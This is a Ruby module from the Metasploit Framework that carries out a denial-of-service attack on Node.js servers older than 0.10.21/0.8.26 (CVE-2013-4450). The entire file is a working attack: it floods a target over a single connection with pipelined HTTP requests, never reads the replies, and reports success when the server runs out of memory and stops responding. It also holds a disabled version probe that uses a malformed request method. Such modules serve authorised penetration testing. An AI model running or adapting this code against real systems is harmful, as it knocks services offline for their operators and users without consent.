GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/nodejs_pipelining.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
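# Auxiliary DoS module for CVE-2013-4450. Node.js releases before 0.10.21 and
# 0.8.26 allocate memory without bound when a client pipelines many HTTP
# requests on a single connection and never reads the responses; releases
# from 0.10.21 / 0.8.26 onwards are not affected. The module keeps one TCP
# connection to RHOST:RPORT open and writes RLIMIT identical requests without
# reading anything back. Stability is CRASH_SERVICE_DOWN: a successful run
# takes the target service offline, so use it only against systems you are
# authorised to test.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the RPORT / RLIMIT options.
  #
  # @param info [Hash] metadata merged by the framework via +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Node.js HTTP Pipelining Denial of Service',
        'Description' => %q{
          This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
          released before 0.10.21 and 0.8.26. The attack sends many pipelined
          HTTP requests on a single connection, which causes unbounded memory
          allocation when the client does not read the responses.
        },
        'Author' => [
          'Marek Majkowski', # Vulnerability discovery
          'titanous', # Metasploit module
          'joev' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-4450' ],
          [ 'OSVDB', '98724' ],
          [ 'BID', '63229' ],
          [ 'URL', 'https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/' ]
        ],
        'DisclosureDate' => '2013-10-18',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        # RLIMIT bounds the number of pipelined requests written on the one connection
        OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
      ]
    )
  end

  # Disabled (renamed from +check+) due to false positives and false negatives:
  # https://github.com/rapid7/metasploit-framework/pull/21332
  #
  # Version probe: http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/
  # Releases before 0.10.17 answer a request with the malformed method 'GEM';
  # later releases close the connection without replying.
  #
  # @return [Msf::Exploit::CheckCode] Appears when an HTTP response came back,
  #   Unknown when the server closed the connection without answering,
  #   Safe otherwise
  def _check
    status = Msf::Exploit::CheckCode::Safe('Target does not appear to be a vulnerable Node.js server')
    connect
    begin
      # The write sits inside the protected region so that a failure while
      # sending (not only while reading) still reaches +ensure+ and closes
      # the socket.
      sock.put(http_request('GEM'))
      response = sock.get_once
      # get_once may return nil; to_s keeps the substring test nil-safe
      if response.to_s.include?('HTTP')
        status = Msf::Exploit::CheckCode::Appears('Node.js accepted a malformed HTTP method, likely < 0.10.17')
      end
    rescue EOFError
      # >= 0.10.17 raises EOFError here because there is no response to GEM requests
      vprint_error('Failed to determine the vulnerable state due to an EOFError (no response)')
      return Msf::Exploit::CheckCode::Unknown('No response to malformed HTTP request')
    ensure
      disconnect
    end
    status
  end

  # Builds the value of the +Host+ header: RHOST alone when RPORT is the
  # HTTP default of 80, otherwise "RHOST:RPORT".
  #
  # @return [String]
  def host
    rhost = datastore['RHOST']
    rport = datastore['RPORT']
    return rhost if rport == 80

    "#{rhost}:#{rport}"
  end

  # Renders one minimal HTTP/1.1 request line plus Host header.
  #
  # @param method [String] request method; the probe passes the deliberately
  #   invalid 'GEM', the DoS run uses the default
  # @return [String] the request text, CRLF-terminated with an empty line
  def http_request(method = 'GET')
    "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
  end

  # Opens a single TCP connection and writes RLIMIT pipelined requests without
  # reading any response. A reset, broken pipe or timeout while writing is
  # reported as the likely out-of-memory outcome; failure to connect at all is
  # reported separately. The socket is always released in +ensure+.
  #
  # @return [void]
  def run
    payload = http_request
    begin
      print_status('Stressing the target memory...')
      connect
      datastore['RLIMIT'].times { sock.put(payload) }
      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Unable to connect to #{host}.")
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
    ensure
      disconnect
    end
  end
end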